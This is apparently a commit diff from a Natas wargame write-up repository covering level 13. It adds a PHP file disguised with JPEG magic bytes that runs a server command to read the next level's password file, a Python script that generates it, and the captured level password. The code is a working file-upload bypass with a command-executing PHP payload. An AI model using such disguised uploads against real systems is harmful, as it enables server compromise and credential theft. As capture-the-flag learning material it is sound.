natas14

Author: vaezim

README.md

@@ -40,4 +40,4 @@ Then change the `filename` request parameter to a string with `.php` extension:
   <img src="https://github.com/vaezim/OverTheWire-Writeups/blob/master/natas/media/natas12.png" />
 </p>
 
-13) 
+13) jpeg magic number: `ff d8 ff e0`

natas/code/natas13.php

@@ -0,0 +1,7 @@
+����
+<?php
+
+    exec("cat /etc/natas_webpass/natas14", $output);
+    print_r($output[0]);
+
+?>

natas/code/natas13.py

@@ -0,0 +1,15 @@
+jpeg_magic_number = b"\xff\xd8\xff\xe0"
+with open("./natas13.php", "wb") as f:
+    f.write(jpeg_magic_number)
+
+php_code = \
+"""
+<?php
+
+    exec("cat /etc/natas_webpass/natas14", $output);
+    print_r($output[0]);
+
+?>
+"""
+with open("./natas13.php", "a") as f:
+    f.write(php_code)

natas/natas14

@@ -0,0 +1 @@
+qPazSJBmrmU7UQJv17MHk1PGC4DxZMEP